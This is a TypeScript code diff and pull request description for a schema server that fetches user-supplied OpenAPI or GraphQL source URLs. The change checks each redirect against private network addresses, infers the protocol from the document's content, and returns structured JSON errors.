+      `Source ${url} must use http or https, not ${parsed.protocol}`,
+    );
+  }
+  // `URL` brackets an IPv6 literal and lowercases the host.
+  const hostname = parsed.hostname.replace(/^\[|\]$/g, "");
+  if (
+    isPrivateName(hostname) || isPrivateIpv4(hostname) || isPrivateIpv6(hostname)
+  ) {
+    throw new SourceFetchError(
+      `Source ${url} targets a private address (${hostname}); ` +
+        "only publicly reachable http(s) URLs can be fetched.",
+    );
+  }
+  return parsed;
+};
+
+const REDIRECT_STATUSES = new Set([301, 302, 303, 307, 308]);
+
+/**
+ * Fetch, following redirects one hop at a time so every hop's target is
+ * checked before it is requested. Returns the response together with the
+ * URL that produced it — the reliable resolved URL, where `response.url` is
+ * empty on a constructed Response.
+ */
+const fetchFollowing = async (
+  url: string,
+  hopsLeft: number,
+): Promise<{ response: Response; resolvedUrl: string }> => {
+  const target = toFetchableUrl(url);
+  const response = await fetch(target, {
+    signal: AbortSignal.timeout(FETCH_TIMEOUT_MS),
+    redirect: "manual",
+  });
+  const location = response.headers.get("location");
+  if (!REDIRECT_STATUSES.has(response.status) || location === null) {
+    return { response, resolvedUrl: target.href };
+  }
+  await response.body?.cancel();
+  if (hopsLeft === 0) {
+    throw new SourceFetchError(
+      `Source ${url} exceeded ${MAX_REDIRECTS} redirects.`,
+    );
+  }
+  return fetchFollowing(new URL(location, target).href, hopsLeft - 1);
+};
+
+/** `fetchFollowing`, with any network-level failure (DNS, refused connect,
+ *  connect timeout) reported as a `SourceFetchError`. */
+const fetchChecked = async (
+  url: string,
+): Promise<{ response: Response; resolvedUrl: string }> => {
+  try {
+    return await fetchFollowing(url, MAX_REDIRECTS);
+  } catch (error) {
+    if (error instanceof SourceFetchError) throw error;
+    const reason = error instanceof Error ? error.message : String(error);
+    throw new SourceFetchError(`Could not fetch source ${url}: ${reason}`);
+  }
+};
+
 /** Fetch a `source` URL: follow redirects, enforce a timeout and size cap,
  *  and report the final URL + content digest. */
 export const fetchSource = async (
   url: string,
 ): Promise<{ schema: string; source: ResolvedSource }> => {
-  let response: Response;
-  try {
-    response = await fetch(url, {
-      signal: AbortSignal.timeout(FETCH_TIMEOUT_MS),
-      redirect: "follow",
-    });
-  } catch (error) {
-    const reason = error instanceof Error ? error.message : String(error);
-    throw new SourceFetchError(`Could not fetch source ${url}: ${reason}`);
-  }
+  const { response, resolvedUrl } = await fetchChecked(url);
+
   if (!response.ok) {
     await response.body?.cancel();
-    throw new SourceFetchError(
-      `Source ${url} returned ${response.status} ${response.statusText}`.trim(),
-    );
+    // Status only — the target's `statusText` is its text, not ours.
+    throw new SourceFetchError(`Source ${url} returned ${response.status}`);
   }
-  const bytes = await readCapped(response, url);
+  const bytes = await readSourceBody(response, url);
   return {
     schema: new TextDecoder().decode(bytes),
-    source: {
-      url,
-      // A constructed Response (tests, some proxies) has an empty `url`;
-      // fall back to the requested one.
-      resolvedUrl: response.url === "" ? url : response.url,
-      digest: await toDigest(bytes),
-    },
+    source: { url, resolvedUrl, digest: await toDigest(bytes) },
   };
 };
 

--- a/deno/server/src/schemaInput.ts
+++ b/deno/server/src/schemaInput.ts
@@ -48,46 +48,71 @@ const MAX_SOURCE_BYTES = 20 * 1024 * 1024;
 const MAX_REDIRECTS = 5;
 
 /**
- * Does this text present itself as a JSON/YAML document rather than GraphQL
- * SDL? A leading `{` is JSON; an `openapi:` / `swagger:` key line is YAML
- * OpenAPI. When such a document fails to parse, the input is a broken OAS
- * document — NOT SDL — so the failure must surface rather than be reclassified.
+ * Does this text carry a GraphQL SDL definition? Every SDL keyword that can
+ * open a definition, followed by whitespace — which is what separates SDL's
+ * `type Query {` from YAML's `type: string`.
+ *
+ * This is a POSITIVE test, deliberately: gql is not the fallthrough for
+ * "everything that isn't OpenAPI". An HTML error page and a JSON document
+ * with no `openapi` key are neither protocol, and saying so beats handing
+ * them to the GraphQL parser and reporting its syntax error.
  */
-const looksLikeOasDocument = (schema: string): boolean =>
-  schema.trimStart().startsWith("{") ||
-  /^[ \t]*(openapi|swagger)[ \t]*:/m.test(schema);
+const looksLikeSdl = (schema: string): boolean =>
+  /^[ \t]*(type|interface|enum|union|input|scalar|schema|directive|extend)[ \t]+/m
+    .test(schema);
+
+type ParseOutcome =
+  /** Read as a JSON/YAML mapping — the shape an OAS document has. */
+  | { kind: "document"; document: object }
+  /** Read, but not as a mapping: a plain scalar (an HTML page reads as one),
+   *  a list, `null`. */
+  | { kind: "scalar" }
+  | { kind: "unreadable"; reason: string };
+
+const toParseOutcome = (schema: string): ParseOutcome => {
+  try {
+    const parsed = stringToSchema(schema);
+    return parsed !== null && typeof parsed === "object" &&
+        !Array.isArray(parsed)
+      ? { kind: "document", document: parsed }
+      : { kind: "scalar" };
+  } catch (error) {
+    const reason = error instanceof Error ? error.message : String(error);
+    return { kind: "unreadable", reason };
+  }
+};
 
 /**
- * Infer the protocol from document content: a JSON/YAML document carrying an
- * `openapi` or `swagger` key is OAS; anything else is treated as GraphQL SDL
- * (whose parse issues, if any, surface through the normal gql parse path).
+ * Infer the protocol from document content: a JSON/YAML mapping carrying an
+ * `openapi` or `swagger` key is OAS; a document carrying an SDL definition is
+ * GraphQL. Anything else raises `SchemaReadError` (→ 422) rather than being
+ * routed to a parser that will only be able to say the text is not its
+ * language — an HTML error page from a `source` behind an SSO wall, a JSON
+ * document with no `openapi` key, a truncated document, an empty response.
  *
- * A document that announces itself as OAS but cannot be parsed raises
- * `SchemaReadError` (→ 422) instead of falling through to SDL — otherwise a
- * truncated OpenAPI document, an HTML error page returned by a `source` URL,
- * or an empty response comes back as 200 with a GraphQL syntax error, which
- * names the wrong problem.
+ * The two tests are independent, so neither ordering nor the parse succeeding
+ * decides the answer alone: single-line SDL (`type Query { a: Int }`) reads as
+ * a YAML mapping, and SDL with a field named `openapi` fails the YAML parse.
  */
 export const inferProtocol = (schema: string): "oas" | "gql" => {
   if (schema.trim() === "") {
     throw new SchemaReadError("The schema document is empty.");
   }
-  try {
-    const document = stringToSchema(schema);
-    if (
-      document !== null && typeof document === "object" &&
-      ("openapi" in document || "swagger" in document)
-    ) {
-      return "oas";
-    }
-  } catch (error) {
-    if (looksLikeOasDocument(schema)) {
-      const reason = error instanceof Error ? error.message : String(error);
-      throw new SchemaReadError(`Could not read OAS document: ${reason}`);
-    }
-    // Not JSON/YAML — fall through to SDL.
+  const outcome = toParseOutcome(schema);
+  if (
+    outcome.kind === "document" &&
+    ("openapi" in outcome.document || "swagger" in outcome.document)
+  ) {
+    return "oas";
   }
-  return "gql";
+  if (looksLikeSdl(schema)) return "gql";
+  throw new SchemaReadError(
+    outcome.kind === "unreadable"
+      ? `Could not read the document as JSON or YAML: ${outcome.reason}. ` +
+        "Pass an OpenAPI document or GraphQL SDL."
+      : "The document is neither an OpenAPI document (no `openapi` or " +
+        "`swagger` key) nor GraphQL SDL.",
+  );
 };
 
 const toDigest = async (bytes: Uint8Array<ArrayBuffer>): Promise<string> => {
@@ -190,11 +215,15 @@ const isPrivateIpv6 = (hostname: string): boolean => {
 };
 
 /** Names that resolve inside a private network by convention. */
-const isPrivateName = (hostname: string): boolean =>
-  hostname === "localhost" ||
-  [".localhost", ".local", ".internal"].some((suffix) =>
-    hostname.endsWith(suffix)
-  );
+const isPrivateName = (hostname: string): boolean => {
+  // A fully-qualified name keeps its trailing dot through `URL`, and
+  // `localhost.` resolves exactly where `localhost` does.
+  const name = hostname.endsWith(".") ? hostname.slice(0, -1) : hostname;
+  return name === "localhost" ||
+    [".localhost", ".local", ".internal"].some((suffix) =>
+      name.endsWith(suffix)
+    );
+};
 
 /**
  * Reject a `source` that points at the deployment's own network rather than


### PR DESCRIPTION
## What

Two related upgrades to the stack server's front door (`@skmtc/server`):

### Self-describing home page
- `GET /` serves a markdown contract to curl/agents and a layered HTML page to browsers (content-negotiated on `Accept`); `/index.md` and `/llms.txt` carry the same markdown.
- Identity (name, version, description, hub link) derives from the stack's `deno.json` via `toStackIdentity`; falls back to a generic page.

### `source` URL input + structured errors
- `/artifacts`, `/subjects`, `/enrichment-defaults` and `/to-v3-json` accept exactly one of `schema` (inline document) or `source` (an http(s) URL the server fetches — redirects followed, 10s timeout, 20MB cap).
- `protocol` is now optional: inferred from document content (`openapi`/`swagger` key → oas, else GraphQL SDL); explicit value overrides.
- `/artifacts` echoes `source: {url, resolvedUrl, digest}` — the post-redirect URL plus a sha256 of the fetched bytes, so a run against a moving URL is reproducible after the fact. Attribution `schemaSrc` defaults to the resolved URL.
- Errors are structured JSON instead of Hono's bare-text 500: `400 invalid_request` with field-level issues, `422 source_fetch_failed` / `invalid_schema` with a reason, JSON 500 otherwise — implementing the 400/422 responses `openapi.json` already advertised.
- Contract regenerated at 1.1.0 with `ResolvedSource` and `ErrorResponse` components.
- Home page leads with the zero-asset first command: `curl -d '{"source":"https://petstore3.swagger.io/api/v3/openapi.json"}'`.

## Test plan

- 25 package tests including new coverage: protocol inference (oas + gql), exactly-one validation, non-http source rejection, stubbed source fetch + echo, non-2xx / unreachable source → 422, unreadable document → 422, non-JSON body → 400.
- Full workspace gate green: 3095 tests, 0 failed.
- Live smoke test: `{"source": petstore3 openapi.json}` → 200, digest echoed, zero parse issues.